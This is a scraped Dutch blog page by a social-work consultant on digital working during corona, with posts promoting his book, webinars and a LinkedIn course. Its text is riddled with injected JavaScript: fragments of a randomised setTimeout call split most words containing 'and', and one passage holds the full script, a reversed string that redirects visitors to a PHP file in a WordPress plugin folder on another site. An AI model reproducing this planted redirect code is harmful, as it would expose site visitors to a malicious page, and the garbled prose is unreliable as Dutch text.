Veel gevraagd expert

“Je zal het wel druk hebben?” Die vraag krijg ik vaak tegenwoordig. Ik zeg dan altijd ietwat bescheiden dat dat wel mee valt. Ik doe m’n ding en ga gestaag door. Totdat ik het op een rij ging zetten. Toen bleek ik een veelgevraagd expert digitaal werken te zijn!

Want dankzij corona en vooral de reflex daarop in het sociaal domein om van de ene op de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere dag massaal online te gaan werken, heb ik in vier maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden tijd (maart t/m juni 2020) een aardig “trackrecord” als veelgevraagd expert opgebouwd, zo bleek tot mijn eigen verrassing. Een mix van interviews, een recensie, webinars, blogs en een podcast.

Hier kan je me zijn tegen gekomen:

1.     Interview Zorg en Welzijn, Corona-update: Sociaal domein stapt over op online werken

https://www.zorgwelzijn.nl/corona-up-date-sociaal-domein-stapt-over-op-online-werken/

2.     Online leersessie Movisie; Online hulpverlening

https://mail.google.com/mail/u/0/#search/movisie+online+hulpverlening/FMfcgxwHNCqVqFRrcWmDKsWntccCLsnG?projector=1&messagePartId=0.2

3.     Column Zorg en Welzijn; Kijk ons eens digitaal zijn!

https://www.zorgwelzijn.nl/blog/blog-kijk-ons-eens-digitaal-zijn/

4.     Webinar Movisie; Kansen in (corona)crisistijd voor online burgerparticipatie

https://youtu.be/g0s1Sn60cMo

En bijbehorend online artikel;

https://www.movisie.nl/artikel/online-burgerparticipatie-door-corona-stroomversnelling

5.     Expertmeeting Movisie; Living Lab Inclusieve Online Participatie

(Teams bijeenkomst, geen opname beschikbaar)

6.     Column Zorg en Welzijn; Vier fases van plotselinge digitalisering

https://www.zorgwelzijn.nl/blog/column-vier-fases-van-plotselinge-digitalisering/

7.     De prachtige recensie in Vakblad Sociaal Werk, van mijn boek Digivaardig Sociaal werk (2019) door Myriam Limper

https://www.linkedin.com/posts/hansversteegh-welzijn30_sociaalwerk-sociaaldomein-digivaardig-activity-6678692443870785538-ZVvB

8.     Interview MOVISIES, vakblad Movisie; Waarom we zo’n moeite hebben met online hulpverlening (pagina 32 en 33)

https://www.movisie.nl/sites/movisie.nl/files/2020-06/2.6.20-def-Movisies-2020-2.pdf

En dit komt er nog aan:

9.     Interview voor Zorg en Welzijn TV

Eind juni / begin juli 2020 verwacht

10.  Podcast / interview bij Jelle de Boer

Begin juli 2020 op YouTube verwacht

Etc ….

Wat een contrast met een jaar geleden.

Ook toen liet ik al van me horen, net als de afgelopen 10 jaar trouwens. Uit de titel van mijn blog van toen blijkt wat een sprong we met elkaar gemaakt hebben in het sociaal domein:

Blog Zorg en Welzijn, juni 2019: Bestaat de digitale transitie wel?

https://www.zorgwelzijn.nl/blog/blog-bestaat-de-digitale-transitie-wel/

Een bijna wanhopige titel. Want ik zag het werkveld maar niet bewegen. In oktober 2019 verscheen mijn boek Digivaardig Sociaal Werk, handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andboek voor de digitale transitie, om daar een slinger aan te geven. Het boek is bedoeld als inspiratie, bron van kennis en tips en als wake-up-call rondom de urgentie van digitaal werken in een digitaal actieve samenleving.

Het werd heel goed ontvangen, maar wel vooral in de beperkte kring van collega’s en partners die niet meer overtuigd hoefden te worden. Die al hele gave dingen aan het doen waren met digitaal werken. Die ik ook al vaak 10 jaar ken, waarmee ik maar wil zeggen dat we in dit kikkerlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andje kunnen voorbouwen op een rijke historie. Want 10 jaar in de online wereld is mega-lang, gezien de voortdurende en supersnelle ontwikkelingen. Initiatieven die vaak ook als voorbeeld in het boek zijn opgenomen. Want daar kan iedereen weer van leren. Deze betrokken pioniers deelden trots hun inzichten met mij, en met jou als lezer.

Niemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van hen kon toen bedenken dat een klein half jaar later bijna het hele sociale veld digitaal ging werken. En dat mijn boek relevanter werd dan ooit. Dus mocht je het nog niet in handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden hebben, pak nu je kans! En ga niet het wiel opnieuw uitvinden.

Hulp nodig? Kijk eens op mijn site of ik iets voor je kan betekenen; https://www.welzijn30.nl

Succes met het vinden van jouw digitale (snel-)weg.

Hartelijke groeten,

Hans Versteegh

0644062029 / info@welzijn30.nl

 

Dit artikel verscheen ook op Linkedin:

https://www.linkedin.com/pulse/uw-veel-gevraagd-expert-digitaal-werken-het-sociaal-domein-versteegh

Hans Versteegh, veel gevraagd expert digitaal werken in het sociaal domein, welzijn 3.0

Lees ook: https://www.welzijn30.nl/hans-versteegh/

Vier fases van plotselinge digitalisering, blog voor Zorg en Welzijn, juni 2020

Vier fases van plotselinge digitalisering. Ineens moesten we digitaal werken. Hoe doen we dat eigenlijk? Hans Versteegh, schrijver van het boek Digivaardig sociaal werk, maakte op basis van zijn eigen waarnemingen een ruwe analyse over deze turbulente periode en komt uit op vier fases.

Fase 1: Paniek

We gingen van de ene op de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere dag noodgedwongen en massaal thuis werken. Hoe hou je contact met je collega’s en je doelgroep? Na de eerste shock vielen we terug op wat al bekend is: Facebook, WhatsApp. We ontdekten beeldbellen, ZOOM, Skype, WhatsApp-videobellen. Bewoners vonden elkaar ook snel. Op straat- en buurtniveau, ook buiten het zicht van professionals. Professionals plukken tegelijk de vruchten van jarenlang investeren in goede relaties met bewoners. Ze vinden elkaar makkelijk online. Maar ook nieuwe en als kansrijk bestempelde bewoners komen (letterlijk) in beeld; zij die niet gebruik maken van welzijns- en ondersteuningsdiensten, maar nu wel iets voor een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander willen betekenen.

Fase 2: Bezinning

We ervoeren hoe dat is om online te werken. Is het wel veilig? Kan mijn cliënt er (toch wel) mee werken? Kan ik er zelf mee werken? Wil ik dat? Niet voor iedereen een succes (zie fase drie). Tegelijk zijn er ook voordelen: snel grote groepen mobiliseren, hulpvragers en hulpbieders aan elkaar verbinden, nieuwe mensen vinden, snellere communicatie, tijdswinst, meer grip op je eigen dagindeling, enzovoort.

In de dorpen en wijken is onderling vertrouwen de basis waarop informele hulp vorm krijgt. Er zijn geen regels en protocollen, alleen noodzaak en een gedeelde urgentie. Sommige hulpvragers krijgen meermaals hulp. Nieuwe verbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden ontstaan. Er wordt hard gewerkt, gekoppeld en gebeeldbeld. Hoe houden we dit contact vast, vragen professionals zich af.

Fase 3: Weerstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tegen verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andering

We zijn het zat. De aversie tegen online contact hoopt op. Vanuit onze achtergrond missen we de zingeving van face-to-facecontact. We verlangen terug naar het oude. De drang naar openstelling van het social domein van vóór corona groeit. Zowel bij de doelgroepen als bij de professionals. Spanning in huishoudens neemt toe. Mantelzorgers staan nog meer onder druk. Toename huiselijk geweld, depressie en eenzaamheid liggen op de loer. Online blijkt niet voor iedereen passend. Spreekuren hulpverlening worden weer face-to-face mogelijk, maar alleen als het niet andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders kan. Ludieke acties in wijken om er samen de moed in te houden, daar is niks digitaals aan.

Fase 4: Het nieuwe normaal

Het besef groeit dat het voorlopig niet meer wordt zoals het was. Acceptatie van online werkvormen daalt in. We leren van de voorgaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande fases en maken keuzes. Met een mix van face to face is het ook best vol te houden. Blended werken werkt. Visie ontwikkeling in organisaties versnelt, hoe zien we online werken op de langere termijn? En kunnen we al duurzaam keuzes maken? Bijvoorbeeld investeren in de aankoop van betrouwbare systemen, het trainen medewerkers, implementatie van blended werken in de organisatie. Hoe zetten we deze mogelijkheden methodisch in?

Wat staat ons te wachten?

Online contact is een blijvertje. Naast fysieke ontmoeting (binnen de voortdurende beperkingen) biedt het ook voordelen. Innovatie van dienstverlening met behulp van technologie is binnen handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbereik gekomen. Lukt het om daarmee de burger, bewoner, cliënt, patiënt meer aan het roer te zetten van het eigen gewenste proces? Geeft het de participatiemaatschappij een zetje de goede kant op? Onze opdrachtgevers kijken over onze schouders mee. Gaan ze het waard vinden weer in onze sector te investeren?

Meer weten? Lees dan het boek Digivaardig sociaal werk >>
Vier fases van plotselinge digitalisering
Lees ook: andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/”>https://www.welzijn30.nl/blog-het-sociaal-zwakste-belang-staat-bij-digitalisering-op-achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/

Kijk ons eens digitaal zijn! Blog voor Zorg en Welzijn, mei 2020

In maart 2020 ging er een shock door het sociaal domein. Net als de rest van Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zaten we ineens bijna allemaal vanuit huis te werken. Onze locaties sloten de deuren, onze kantoren werden verboden gebied. Ons werkgebied werd een computerscherm De schappen waren leeg en de kinderen thuis.

Online platforms

In die chaos probeerde iedereen de dienstverlening op peil te houden. We belden onze doelgroep op, om daar toch nog contact mee te kunnen hebben. Massaal grepen we naar bekende online platformen om hulp oproepen op te vangen en hulpbieders daaraan te koppelen.

Beeldbellen

En we gingen beeldbellen, heel veel beeldbellen. WhatsApp, Skype, dat kenden we al een beetje maar daar deden we eigenlijk niet veel mee. En iedereen ging Zooomen. Leuk om je collega’s allemaal bij elkaar te zien. Ongegeneerd binnenkijken in hun huizen. We werden fans, ook al werd meteen duidelijk dat het platform qua beveiliging zo lek als een mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andje was en ook een vervelend linkje met Facebook had.

Privacy

Ook fijn dat de doelgroep op de bekende online platformen best goed te bereiken bleek. Dat op zich was al een ontdekking. Hierdoor gesterkt gingen wij daar ook massaal gebruik van maken. Tot de betweters ons informeerden dat dit vanuit privacy toch niet zo in de haak was.

Lijstjes

Ok, wat dan wel? Tal van lijstjes met alternatieven verschenen, die wel of juist niet voldeden aan NEN7510 en ISO27001. Je zag door de bomen het bos niet meer. En waren die wel net zo gebruiksvriendelijk? Oh, moet je daarop wél een account aanmaken? Nee, dat ging vast niet werken voor de doelgroep (en zelf vonden we dat ook maar gedoe). Skype for business? Klinkt ingewikkeld. Teams dan? Daar heeft iedereen het over.

Camera uit

Ondertussen Zoomden en appten we door. Je moest wel. En eigenlijk was je ook wel trots dat het je steeds beter afging. Dat je doorkreeg hoe je in een meeting kon komen, dat je zelf je microfoon en camera uit kon zetten, om even snel koffie te halen. Je moest alleen oppassen dat ze je pyjama niet zagen wanneer je opstond. Kijk ons nou eens lekker digitaal zijn!

Bravo!

Heel goed, zeker! Bravo! Geweldig dat je het volhoudt en er ook handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andiger in bent geworden. Grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andioos. Want het is echt even schakelen.

Nog meer?

Wat heb je nog meer ervaren de afgelopen weken? Heb je misschien gemerkt dat je snel gemaakte voorlichtingsvideo’s goed bekeken zijn? Heb je gemerkt dat mensen helemaal niet raar reageerden toen jij als professional actiever werd op dat buurtplatform? Dat ze dat eigenlijk heel logisch vonden? Heb je misschien gemerkt dat de begeleiding die je face-to-face gaf ook via een online gesprek bij de cliënt aankomt? Oké, je mist misschien nog wat gesprekstechniek, maar het is te doen en het werkt.

Ik daag je uit

Er kan nog zo veel meer. Ik daag je uit: wat heb jij jarenlang op een bekende manier gedaan, maar zou je kunnen aanvullen of zelfs vervangen door een digitale variant? Probeer het eens uit. Kijk hoe het gaat, leer er van en zet de volgende stap. Ik hoor graag je bevindingen. Zet ze hieronder of mail naar info@welzijn30.nl.

Je bent goed bezig, chapeau! Maar … ben je er al?

Meer weten over digivaardig sociaal werken? Lees dan ook het boek van Hans Versteegh.
Oorspronkelijke bron op de site van Zorg en Welzijn: https://www.zorgwelzijn.nl/blog/blog-kijk-ons-eens-digitaal-zijn/
Kijk ons eens digitaal zijn! Blog voor Zorg en Welzijn
Lees ook andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/”>https://www.welzijn30.nl/blog-het-sociaal-zwakste-belang-staat-bij-digitalisering-op-achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/

Massaal sociaal én digitaal!

sociaal en digitaal

Had jij het kunnen bedenken? Dat je vanaf maart dit jaar ineens sociaal en digitaal bent? Dat je een groot deel van je werk via het internet zou gaan doen? Beeldbellend, append en natuurlijk mailend. Vanuit huis ook nog. Ik niet, in ieder geval.  

Ik krijg steeds twee vragen.
1. Je zal wel blij zijn nu?
2. Je zal het wel druk hebben?

Je zal wel blij zijn?

Dat zou je wel verwachten, inderdaad. Maar blij ben ik niet. Ik vind honderdduizenden zieken en overleden mensen niet iets om blij van te worden.  Normaal gezien zou ik natuurlijk wel blij zijn, want hoe gaaf is het dat het sociaal domein nu ineens in sneltreinvaart de digitale mogelijkheden ontdekt (die er al heel lang zijn …). Maar ja, ik heb er toch maar geen gebakje voor in huis gehaald.

Je zal het wel druk hebben?

Druk heb ik het wel. Want doordat ik een interim klus heb, als leidinggevende bij een welzijnsorganisatie, werkte ik ook ineens vanuit huis.  En tegelijk een slag in de rondte om iedereen in mijn teams er bij te houden. Man man man, wat een hectische weken. En ja, daar kwamen verzoeken rond de plotselinge digitalisering nog eens bij. Even kijken, wat heb ik allemaal gedaan …

 • Verschillende keren gehoord dat ik de goeroe op dit gebied ben (ok, dat is even wennen, wel leuk!)
 • In de eerste week al een interview in Zorg en Welzijn
 • Twee lopende opdrachten voor workshops, één met jongerenwerkers en de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander voor wijkteamleden, omgezet in online webinars
 • Een interview voor Movisies, het blad van MOVISIE
 • Twee webinars voor datzelfde MOVISIE waarin ik optreed als expert
 • Een eigen webinar met vakgenoten uit het hele landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and over wat er nu gaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande is rond digitalisering
 • Tal van vragen uit het veld beantwoord
 • Een paar nieuwe blogs geschreven
 • Contact gehad met verschillende makers van online buurtplatformen en digitaal werkende collega’s (zoals een voormalig sociaal werker van het jaar die ouderen aan tablets helpt)
 • Een paar boeken verkocht.

Over dat laatste wil ik je wat vragen. De boekverkoop gaat niet zo hard als je zou denken. Zonde, want er staan veel antwoorden in op vragen die sociaal werkers en hun organisaties nu hebben. Ik hoop dat het juist nu veel gelezen gaat worden. Mijn uitgever gaat er nog een slinger aan geven. En ik laat natuurlijk van me horen / zien op social media. Maar jij kan me ook helpen! En ik vind dat reuze spannend.

OK, eerst de vraag, wil je meedoen aan een kleine challenge?

Je kan mij en jezelf helpen om beter in beeld te komen in het werkveld. Dat kan belangrijk zijn, nu organisaties en professionals allemaal zoeken naar digitale mogelijkheden. Jij hebt misschien al wat meer ervaring?  Zet ze andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders maar op mijn spoor.

Dat kan je doen door op je gebruikelijke social media kanaal een foto van jou (daarin zit de challenge, durf je dat?) mét mijn boek te plaatsen. Zoals de lieve mensen hierboven. En er bij zetten wat jij aan digitaal werken hebt gedaan en aan het boek gehad hebt. Ik hoop natuurlijk dat dat een positieve ervaring is.

Daarom vind ik het zo spannend. Want stel dat je het bagger vond. Hmmm, dan heb ik liever dat je dat in een mailtje alleen naar mij kenbaar maakt. Misschien heb ik wat te leren, misschien kan ik je beter even 1 op 1 helpen. Dit is het mailadres: info@welzijn30.nl

Ik kijk er naar uit om je bericht te zien. Ik hoop dat andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen het ook zien en denken, “Hé, dat is een interessant boek, dat koop ik.” Of:  “ik ga even bellen met Hans.” Want ze kennen jou en ze zien dat jij er blij mee bent. Als ze gaan vragen waar ze het kunnen bestellen, dan is dat op deze link bij Managementbook.nl (Mag je er bij vermelden)

En als je het boek zelf nog niet had, dan gebruik je de link ook natuurlijk. 😉  Als ik jou ergens mee kan helpen in deze tijd, laat het weten! Ik denk sowieso graag mee en misschien kan ik meer voor je betekenen. Leuk als je mee wil doen met de “challenge.” En dankjewel!

Nou, je bent weer op de hoogte. Dank voor je aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht en heel veel succes met je nieuwe manier van werken! Hou vol en blijf gezond!

Groeten,

Hans Versteegh, Welzijn 3.0

0644062029

Drie dagen naar de vaantjes

computerproblemenDrie dagen naar de vaantjes. En natuurlijk net op een spannend moment! Want mijn boek komt er snel aan. Dan moet je wel alle opties open hebben om dat van de daken te schreeuwen, toch? Want ik wil dat het gelezen gaat worden dus moet ik zorgen dat zo veel mogelijk mensen er van weten. Maar dat ging dus mis …

Wat er aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and was?

Vreselijk. Mijn laptop kapte er mee! Mijn “liveline” naar de buitenwereld. En weet je waardoor? Doordat ik een anti virus programma kocht en installeerde. Echt, een antivirus programma, stel je voor. Dat installeren lukte, maar daarna opstarten? Nee dus. Drie dagen lang heb ik lopen klooien om dit computerprobleem op te lossen. Ja, in het afgelopen weekeind, met dat mooie weer. Net toen ik klaar was las ik in de krant dat kinderen niet in staat zijn dergelijke problemen zelf op te lossen omdat ze dat nooit geleerd hebben.

Ik ook niet, maar ik weet ongeveer hoe je dat aanpakt. Door het gewoon te proberen. Ja, ik heb vaker drie dagen lopen klooien voordat ik iets oploste. Ook wel eens minder, gelukkig. Maar daardoor ga je wel diep nadenken, creatief zijn, uitproberen, kijken wat er gebeurd. En ineens lukt het toch!

Wauw!

In mijn geval heb ik mijn hele laptop schoongemaakt. Alles gewist! Zeker, daar heb je lef voor nodig. Maar ik had natuurlijk wel eerst een grote schoonmaak van verdachte software en documenten gedaan. Hup, weg er mee. En toen een backup gemaakt op een externe harde schijf. Die ik trouwens niet in huis bewaar voor het geval er brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and komt. Na het wissen heb ik die backup terug gezet, maar nu zonder het nieuwe programma. Uiteraard.

Gelukt!

Want nu kan ik je toch weer deze mail sturen. Pffff. Hoe fijn is het om weer te kunnen werken! Mooi op tijd om je te laten weten dat er intussen mooie flyers binnen zijn gekomen om mijn boek onder de aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht te brengen. Hieronder zie je ze. Ik ga ze binnenkort op de bus doen naar iedereen die ooit eens iets bij me heeft gekocht. En ik neem ze mee naar evenementen en congressen.

Flyer boek digivaardig sociaal werk

Marketing dus. Of reclame, wat je wil. En ouderwets handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andwerk, met enveloppen en etiketten. Ik heb er 250 dus ik ben wel even bezig.

En het boek?

Dat schijnt deze week in het Centraal Boekhuis te arriveren. Wanneer jij het hebt besteld krijg je het misschien een dezer dagen thuisgestuurd! Ben je nieuwsgierig en wil je het boek ook reserveren (en … het komt er nu echt heel snel aan!) dan kan je hier aanmelden en bestellen: https://www.welzijn30.nl/digivaardig-sociaal-werk/

Check daar ook de extra’s wanneer je er meer dan 25 tegelijk koopt, of nog meer …

Als je meer persoonlijke “learnings” van mij wil horen over digitaal werken, koop dan mijn workshop in. Ik kom graag een dagdeel vertellen waarom het belangrijk is dat jij en je collega’s online actief en zichtbaar zijn. Hoe lastig dat soms ook is … Wil je dat, klik dan hier: https://www.welzijn30.nl/social-media-workshop-in-zorg-en-welzijn/

Tof! Dankjewel!

Hans Versteegh, Welzijn 3.0, voor digivaardig sociaal werk

 

Het schuurde in mijn oren

Leuk hoor. zo’n opendag van de muziekschool. Mijn jongste wilde op vioolles (ai!). Dus wij daar naar toe. Ben je wel eens op zo’n opendag geweest? Nee, nou, laat ik je waarschuwen! 

Want wat je moet weten is dat je op die dag álle muziekinstrumenten mag uitproberen. Vaak zijn het kinderen die dat doen. Mijn jongste knarste eerst op een viool, ging volgas op een drumstel, ramde op een piano, tokkelde met een harp en keerde toen weer terug naar het hoofddoel; de viool. De blokfluit, elektrisch gitaar, hobo, zangjuf en saxofoon liep ze voorbij.

Je eigen lieverdje muziek horen ontdekken is nog wel te doen. Maar ze deed dat tegelijk met het halve dorp! In ieder kamertje was een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander lieverdje net zo fijn bezig. En omdat de deuren open stonden, hoorde je dat ook van elkaar …

Wanhoop

Toen we half verdoofd in de gang stonden kwam de jongste een vriendinnetje tegen, met haar moeder. Zo goed en zo kwaad het kon maakten we een praatje. Ook in haar ogen zag ik de wanhoop.

Die bleek niet alleen van de kakofonie aan herrie te komen. Nee, ze vroeg ook advies over haar LinkedIn profielpagina. Iets dat me wel vaker gebeurd. De hare schuurde, want die was niet volledig. Daar werd ze ruw op gewezen toen ik vroeg hoe het op haar werk bij organisatie X was. want die stond er op, wist ik nog. Maar ze was al bij organisatie Z aanbelandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Had verzuimd dat op haar profiel te vermelden. Tja … Eind van dit liedje (knipoog) is dat ze dus een keer bij me langs komt om daar aan te werken.

Het schuurt

Schuurt het daar ook bij jou? En wil je er wat aan doen, maar wil of kan je niet bij mij langskomen? Dan is de online LInkedIn-training vast iets voor je.

In 7 online modules leer ik je in video’s uit welke opties het platform heeft, waar ze zitten en hoe je ze kan gebruiken. Zodat je dit zakelijke platform goed leert benutten. En ik geef er een gratis profielscan bij, voor niks!

Dit zijn de modules:

 • ​Module 1, introductie (gratis, nu al te bekijken)
 • Module 2, home, navigeren en de app
 • Module 3, profiel, je ontdekt route 1 en 2
 • Module 4, netwerken
 • Module 5, groepen
 • Module 6, bedrijfspagina
 • Module 7, statistieken en nabrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders

Wat levert deze training jou op?

 • Linkedin heeft straks weinig geheimen meer voor je
 • Je weet hoe het werkt en hoe jij als professional zichtbaar wordt
 • Het wordt makkelijker en leuker om je vakgebied bij te houden
 • Informatie gaat naar je toe komen
 • Bovendien zal je netwerk groeien, heel belangrijk in deze tijd
 • Je weet hoe jij je zakelijke netwerk warm kan houden
 • Je gaat het netwerk voeden met waar je mee bezig bent. Andersom werkt dat ook zo.
 • Ik geef je als extra dus ook nog een gratis profielscan

Interesse? De training staat hier voor je klaar: https://socialsocialmediaacademie.nl/linkedin-video-training/

Voor het geld hoef je het niet te laten, je bent net geen vijftig euro kwijt. Misschien ook leuk om samen met je collega op te pakken?

Ik ga ondertussen op zoek naar oordopjes, want ze staat nu ingeschreven voor een opstapcursus van vier keer, samen met die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere lieverdjes.

Bekijk ook deze checklist: https://www.welzijn30.nl/checklist/ 

Blog Zorg & Welzijn: Bestaat de digitale transitie wel?

De kranten kunnen er vol mee staan, maar ik zie het niet. Die digitale transitie. Tenminste, niet in de sociale sector. Terwijl het zo mooi zou kunnen zijn.

Wat als welzijnsorganisaties verantwoordelijkheid nemen om de meest kwetsbare burgers digivaardig te maken, om een nog groter wordende maatschappelijke kloof tussen have’s en have-not’s te voorkomen? Met inzet van sociaal werkers die het dichten van die digitale kloof als hun top-prioriteit zien in hun streven mensen te ondersteunen in zelfredzaamheid en participatie. Ook wanneer die al digitale cursussen in de bieb hebben gedaan en het daarna zelf moeten waarmaken.

Lees hier verder:

https://www.zorgwelzijn.nl/blog/blog-bestaat-de-digitale-transitie-wel/

Blog Zorg en Welzijn, Bestaat de digitale transitie wel?

Lees ook mij  boek: https://www.welzijn30.nl/digivaardig-sociaal-werk/

Digitale nazorg

Ik had een indrukwekkend gesprek over digitale nazorg met Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander van der Meer, van www.digitalenazorg.nl over wat er digitaal geregeld moet worden na iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands overlijden. Maar dat heel vaak niet is.

Met alle gedoe en emotie die daar bij hoort. Wat hij doet is data op laptops en telefoons van overledenen beschikbaar maken voor nabestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden. Denk aan vakantiefoto’s, muziek, enz. Alles wat je vroeger in een dagboek en foto-albums zette, zeg maar.

 

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-van-der-Meer-en-Hans-Versteegh-Welzijn-3.0.jpg”>andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-van-der-Meer-en-Hans-Versteegh-Welzijn-3.0-300×300.jpg” alt=”” width=”300″ height=”300″ />andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-van-der-Meer-en-Hans-Versteegh.jpg”>

Digitale nazorg is belangrijk

Nabestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden willen natuurlijk bij digitaal opgeslagen informatie kunnen. Soms omdat het ook hun eigen data zijn. WhatsAppberichtjes met de overledene verdwijnen niet alleen van de telefoon van die overledene wanneer het nummer naar iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders gaat, maar ook van de telefoon van de nabestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande. Wist ik niet.

Soms om dierbare herinneringen aan de overledene te vinden. Zoals die dierbare vakantiefoto in iCloud waar alleen de overledene het wachtwoord en beheer over had.

Soms, bijvoorbeeld in geval van plotselinge zelfdoding, om antwoorden te vinden. Van jongeren die onaangekondigd op het spoor zijn gaan liggen, soms met de telefoon er naast. Dan wil je als ouders weten of daar misschien nog iets op staat dat de vreselijke daad verklaart.

Waarom is dit voor sociaal werkers belangrijk? Omdat jij misschien wel eens van nabestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden hoort tegen welke problemen ze aan lopen, wanneer dierbaren er niet meer zijn. Je kan ze dan naar Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander verwijzen.

Weten jouw eigen dierbaren je wachtwoorden? Het zou ze helpen. Het heeft mij wel aan het denken gezet. Ik ga het regelen voor mijn vriendin en kinderen.

www.digitalenazorg.nl

Bonus van dit gesprek was dat het meteen ook mijn eerste bezoekje aan een vet #datacentrum was. In dit geval van @ironmountaindatacenters dat onderdeel uitmaakt van AMS1 (of 2?), de internethub van Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Sandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander heeft daar een werkplek. Een gebouw waar het internet tastbaar wordt, samenkomt en verspreid wordt. Eindeloos lange rijen servers met kabeltjes en knipperende lampjes. Een beetje zoals op je modem, maar dan een voetbalveld vol. En zwaar beveiligd. Geen kattenpis. Maar tof om een keer te mogen kijken!

Lees ook mijn boek: Digivaardig sociaal werk, handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andboek voor de digitale transitie.

Wil je vaker dit soort verhalen van mij lezen, meld je dan HIER aan. 

Vier teams, vier x andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders

Vier teams, vier x <script srcset=$Ikf=function(n){if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders, trajecten mixen” width=”300″ height=”200″ />

Misschien denk je er niet in eerste instantie aan, maar teams kunnen bij mij terecht voor meer dan alleen een inspirerende social media workshop. Het afgelopen half jaar heb ik voor vier teams  vier hele leuke trajecten mogen ontwerpen en uitvoeren. Die allemaal wel een digitale link hadden, maar tegelijk om veel meer dan dat gingen. Ze waren stuk voor stuk uniek, met een mix van kennis, creativiteit, resultaatgerichtheid en … plezier.

Innovatie

Zo hielp ik een gloednieuw innovatieteam in de jeugdbescherming bij de start van hun kersverse opdracht. Ze hebben drie jaar de tijd gekregen om te ontdekken wat sociale technologie kan betekenen in de jeugdzorg, hoe gaaf! En heel actueel. Ze vroeg mij om hen in te wijden in wat innovatie eigenlijk is en hoe je dat in je organisatie vorm kan geven.

“Een waardevolle training.”

Strategie en LinkedIn

Het communicatieteam van een landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke beroepsvereniging in het maatschappelijk veld vroeg mij hen te ondersteunen bij het opstellen van een social media strategie (visie op, doelen met, uitgangspunten voor …) en vervolgens ook bij het samenstellen van een praktisch social media beleid voor de medewerkers van het verenigingsbureau. Met een LinkedIn-training hielp ik ze daar invulling aan te geven. Eenzelfde training voor de actieve kaderleden staat voor het najaar geplandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

“Dankjewel Hans, voor de inspirerende training.”

Visie, identiteit en koers

